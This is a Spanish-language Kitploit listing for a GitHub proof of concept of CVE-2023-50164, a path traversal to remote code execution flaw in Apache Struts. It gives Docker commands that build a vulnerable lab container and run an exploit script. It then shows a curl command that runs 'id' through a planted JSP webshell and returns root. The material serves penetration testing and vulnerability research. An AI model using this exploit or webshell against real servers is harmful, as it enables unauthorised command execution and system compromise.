Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-50164-PoC — CVE-2023-50164 (vulnerabilidad de path traversal a RCE en Apache Struts) - Prueba de concepto | Kitploit
Herramientas/GitHubGitHub/sunnyvale-it/cve-2023-50164-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubsunnyvale-it/cve-2023-50164-poc

CVE-2023-50164-PoC

CVE-2023-50164 (vulnerabilidad de path traversal a RCE en Apache Struts) - Prueba de concepto

Ver Repositorio
21hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-50164 (Vulnerabilidad de path traversal a RCE en Apache Struts) - Prueba de concepto

Esta PoC ha sido creada para probar un RCE (Ejecución Remota de Código) explotando la vulnerabilidad de Apache Struts2.

Construye la imagen y ejecuta un contenedor:

root@kitploit:~
$ DOCKER_BUILDKIT=1 docker build  . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc

Ejecuta el exploit:

root@kitploit:~
$ cd exploit
$ ./exploit.sh

Ahora puedes ejecutar comandos arbitrarios en el lado del servidor como se muestra:

root@kitploit:~
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a  

uid=0(root) gid=0(root) groups=0(root)

Créditos

  • Gracias a @jakabakos por un ejemplo de aplicación vulnerable (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
  • Gracias a Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) por el diagrama de arriba
  • Descargar herramienta